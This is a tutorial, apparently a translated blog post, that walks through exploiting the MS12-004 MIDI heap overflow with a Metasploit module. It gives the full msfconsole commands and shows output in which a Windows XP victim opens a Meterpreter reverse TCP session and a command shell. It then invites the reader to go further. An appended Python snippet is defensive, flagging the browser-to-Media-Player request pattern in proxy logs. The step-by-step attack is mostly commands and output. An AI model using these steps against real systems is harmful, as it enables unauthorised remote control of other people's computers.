Metasploit: Exploiting MS12-004

On exploiting the MS12-004 vulnerability

  • 1. Open the msf console

    root@kali:~# msfconsole

    PS: you may need to start the database first: /etc/init.d/postgresql start (requires administrator privileges)

  • 2. Search for the exploit module

    msf > search 12_004
    
    Matching Modules
    ================
    
       Name                                   Disclosure Date  Rank    Description
       ----                                   ---------------  ----    -----------
       exploit/windows/browser/ms12_004_midi  2012-01-10       normal  MS12-004 midiOutPlayNextPolyEvent Heap Overflow
    
  • 3. Load the exploit module

    msf > use exploit/windows/browser/ms12_004_midi
    

    The prompt changes to: msf exploit(ms12_004_midi) >

  • 4. View the module options

    msf exploit(ms12_004_midi) > show options
    
    Module options (exploit/windows/browser/ms12_004_midi):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       OBFUSCATE  false            no        Enable JavaScript obfuscation
       SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT    8080             yes       The local port to listen on.
       SSL        false            no        Negotiate SSL for incoming connections
       SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                     no        The URI to use for this exploit (default is random)
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
  • 5. Set SRVHOST (this machine's IP address)

    msf exploit(ms12_004_midi) > set SRVHOST 192.168.43.80
    SRVHOST => 192.168.43.80
    
  • 6. Set URIPATH (the name of the page clients will request; any value works)

    msf exploit(ms12_004_midi) > set URIPATH 1
    URIPATH => 1
    
  • 7. Launch the exploit

    msf exploit(ms12_004_midi) > exploit
    [*] Exploit running as background job.
    
    [*] Started reverse TCP handler on 192.168.43.80:4444 
    msf exploit(ms12_004_midi) > [*] Using URL: http://192.168.43.80:8080/1
    [*] Server started.
    [*] 192.168.43.35    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    [*] 192.168.43.35    ms12_004_midi - Sending html to 192.168.43.35:1090...
    [*] 192.168.43.35    ms12_004_midi - Request as: Windows-Media-Player/9.00.00.3250
    [*] 192.168.43.35    ms12_004_midi - Sending midi corruption file...
    [*] 192.168.43.35    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    [*] 192.168.43.35    ms12_004_midi - Sending html to 192.168.43.35:1094...
    [*] 192.168.43.35    ms12_004_midi - Request as: Windows-Media-Player/9.00.00.3250
    [*] 192.168.43.35    ms12_004_midi - Sending midi corruption file...
    [*] 192.168.43.35    ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    [*] 192.168.43.35    ms12_004_midi - Sending midi corruption file...
    [*] Sending stage (957487 bytes) to 192.168.43.35
    
    msf exploit(ms12_004_midi) > [*] Meterpreter session 1 opened (192.168.43.80:4444 -> 192.168.43.35:1096) at 2017-07-16 02:11:59 -0400
    
    [*] Session ID 1 (192.168.43.80:4444 -> 192.168.43.35:1096) processing InitialAutoRunScript 'migrate -f'
    [*] Current server process: iexplore.exe (3612)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 3324
    [+] Successfully migrated to process 
    
  • 9. Attach to the session ID that was obtained

    msf exploit(ms12_004_midi) > sessions -i 1
    
    [*] Starting interaction with 1...
    
  • 10. Once you have the session, the prompt becomes: meterpreter >

    meterpreter > shell
    Process 1552 created.
    Channel 1 created.
    Microsoft Windows XP [版本 5.1.2600]
    (C) 版权所有 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\Administrator\桌面>
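From the defender's side, the module output above gives away a usable detection pattern: the victim's browser fetches the landing page, and within a second or two Windows Media Player (embedded by that page) fetches the MIDI file from the same host. The following is an added example, not code from the original post: a Python scan over constructed proxy log lines that flags that browser-to-WMP handoff per client and host. The log format, timestamps and the MIDI file path are assumptions made for the sample.

```python
import re
from datetime import datetime, timedelta

# Constructed proxy log lines (not from the original post), modelled on the request
# sequence the module printed above. Assumed format:
#   "<ISO timestamp> <client ip> <method> <url> \"<user-agent>\""
SAMPLE_LOG = """\
2017-07-16T02:11:40 192.168.43.35 GET http://192.168.43.80:8080/1 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2017-07-16T02:11:41 192.168.43.35 GET http://192.168.43.80:8080/1/song.mid "Windows-Media-Player/9.00.00.3250"
2017-07-16T02:11:50 192.168.43.35 GET http://192.168.43.80:8080/1 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2017-07-16T02:11:51 192.168.43.35 GET http://192.168.43.80:8080/1/song.mid "Windows-Media-Player/9.00.00.3250"
2017-07-16T02:15:00 192.168.43.50 GET http://media.example/anthem.mid "Windows-Media-Player/9.00.00.3250"
2017-07-16T02:20:00 192.168.43.60 GET http://news.example/ "Mozilla/5.0 (Windows NT 10.0) Firefox/54.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
HOST_RE = re.compile(r'^https?://([^/]+)')


def parse_line(line):
    """Split one log line into its fields; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, ua = m.groups()
    host = HOST_RE.match(url)
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "url": url, "host": host.group(1) if host else "", "ua": ua}


def find_midi_handoffs(log_text, window_seconds=10):
    """Return (client, host, page_url, midi_url) for each browser page fetch that is
    followed, from the same client to the same host within the window, by a
    Windows-Media-Player request. A WMP download with no preceding browser visit
    to that host (ordinary media streaming) is not flagged."""
    last_browser = {}  # (client, host) -> (timestamp, url) of the latest browser fetch
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        key = (rec["client"], rec["host"])
        if rec["ua"].startswith("Mozilla/"):
            last_browser[key] = (rec["ts"], rec["url"])
        elif rec["ua"].startswith("Windows-Media-Player/"):
            prev = last_browser.get(key)
            if prev and rec["ts"] - prev[0] <= timedelta(seconds=window_seconds):
                hits.append((rec["client"], rec["host"], prev[1], rec["url"]))
    return hits
```

On the sample above, `find_midi_handoffs(SAMPLE_LOG)` reports the two handoffs from 192.168.43.35 to 192.168.43.80:8080 and nothing for the other two clients.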
    

From here on, the show is yours!

For the specifics of what can be done next, a quick Baidu search will tell you everything.